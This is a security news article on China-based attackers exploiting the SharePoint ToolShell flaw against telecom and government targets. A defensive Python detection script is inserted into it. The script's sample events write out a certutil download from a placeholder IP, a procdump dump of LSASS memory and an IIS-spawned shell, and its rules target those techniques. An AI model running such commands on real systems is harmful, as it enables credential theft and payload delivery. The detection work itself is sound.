China-based threat actors exploited ToolShell SharePoint flaw CVE-2025-53770 soon after its July patch.
China-linked threat actors exploited the ToolShell SharePoint vulnerability, tracked as CVE-2025-53770, to breach a telecommunications company in the Middle East shortly after Microsoft patched it in July 2025.
“China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025,” reads the report published by Broadcom’s Symantec Threat Hunter Team.
According to Broadcom’s Symantec Threat Hunter Team, the attackers, linked to Glowworm (aka Earth Estries) and UNC5221, breached multiple targets, including two African government departments, two South American agencies, and a U.S. university. The hackers used tools like Zingdoor and KrustyLoader, and targeted SQL and Apache ColdFusion servers. A fake “mantec.exe” (masquerading as Symantec software) sideloaded malware. Additional victims include a state tech agency in Africa, a Middle Eastern ministry, and a European finance firm.
In July, Microsoft warned of a SharePoint zero-day vulnerability, tracked as CVE-2025-53770 (CVSS score of 9.8), that was under active exploitation. The vulnerability is a deserialization of untrusted data in on-premises Microsoft SharePoint Server; an unauthorized attacker could exploit it to execute code over a network.
Microsoft later confirmed that three China-based groups, Budworm, Violet Typhoon (aka Sheathminer), and Storm-2603, had exploited ToolShell, with the last of these deploying Warlock ransomware.
Other targets included government departments in an African country, government agencies in South America, and a university in the U.S., as well as, likely, a state technology agency in an African country, a government department in the Middle East, and a finance company in a European country.
According to Broadcom’s Symantec Threat Hunter Team, the attacks involved the exploitation of CVE-2025-53770, a now-patched security flaw in on-premises SharePoint servers that could be used to bypass authentication and achieve remote code execution.
Malicious activity at a Middle Eastern telecom began on July 21, 2025, two days after ToolShell was patched, with attackers using a webshell and DLL sideloading to deploy backdoors and loaders. Zingdoor was sideloaded via a Trend Micro binary to collect data, transfer files and run commands. Threat actors sideloaded the ShadowPad backdoor using a BitDefender binary; it supports plug-in updates and has been used alongside ransomware. On July 25, attackers dropped the Rust-based KrustyLoader to fetch second-stage payloads, evade analysis and self-delete. Attackers also employed a variety of publicly available and living-off-the-land tools, including Certutil for file downloads, GoGo Scanner for network scanning, Revsocks for proxying traffic through firewalls, and Sysinternals’ Procdump, PowerSploit’s Minidump, and LsassDumper to extract LSASS process memory and steal credentials.
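The tradecraft described above (shells spawned under the SharePoint web server, certutil downloads, vendor-branded binaries run from user-writable paths, LSASS memory dumps) can be screened for in process-creation telemetry. The following is an added example, not code from the Symantec report: the event records are constructed, the field names are assumed Sysmon-style, and treating w3wp.exe as the SharePoint/IIS worker parent and "mantec" as a Symantec lookalike are this example's own assumptions.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style), not telemetry from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.10/a.dat C:\\Users\\Public\\a.dat"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\mantec.exe",
     "cmdline": "mantec.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\procdump64.exe",
     "cmdline": "procdump64.exe -accepteula -ma lsass.exe out.dmp"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n"},
]

# Directories a low-privileged process can write to; a security vendor's real binary should not live here.
USER_WRITABLE = (r"c:\users\public", r"c:\programdata", r"c:\windows\temp", r"\appdata\local\temp")
VENDOR_NAMES = ("symantec", "trendmicro", "bitdefender")   # vendors named in the report
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def looks_like_vendor(name):
    """True for a vendor name or a truncated lookalike of one (e.g. 'mantec' inside 'symantec')."""
    stem = name.rsplit(".", 1)[0]
    return len(stem) >= 5 and any(stem in v or v in stem for v in VENDOR_NAMES)

def in_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)

def classify(e):
    """Return the names of every rule the event matches."""
    hits = []
    img, cmd = basename(e["image"]), e["cmdline"].lower()
    if basename(e["parent"]) == "w3wp.exe" and img in SHELLS:      # webshell-like child of IIS
        hits.append("iis_spawned_shell")
    if img == "certutil.exe" and re.search(r"-urlcache|-verifyctl|https?://", cmd):
        hits.append("certutil_download")
    if "lsass" in cmd and (img.startswith("procdump") or "minidump" in cmd):
        hits.append("lsass_dump")
    if looks_like_vendor(img) and in_user_writable(e["image"]):     # sideloading host in odd place
        hits.append("vendor_lookalike_in_writable_dir")
    return hits

def detect(events):
    return [(e["image"], h) for e in events for h in classify(e)]

if __name__ == "__main__":
    for image, rule in detect(SAMPLE_EVENTS):
        print(f"{rule:36} {image}")
```

The benign WINWORD.EXE record is included to show the rules stay quiet on ordinary activity; in a real deployment each rule would need tuning against the environment's own baseline.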
“An exploit for the Windows LSA Spoofing Vulnerability, CVE-2021-36942 (aka PetitPotam), was also executed,” continues the post. “PetitPotam is an exploitation technique that allows for a threat actor within a compromised network to steal credentials and authentication information from Windows Servers such as a Domain Controller to gain full control of the domain. This is likely used for lateral movement or privilege escalation.”
The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.
“There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors,” concludes the report. “The large number of apparent victims of this activity is also notable. This may indicate that the attackers were carrying out an element of mass scanning for the ToolShell vulnerability, before then carrying out further activity only on networks of interest.”
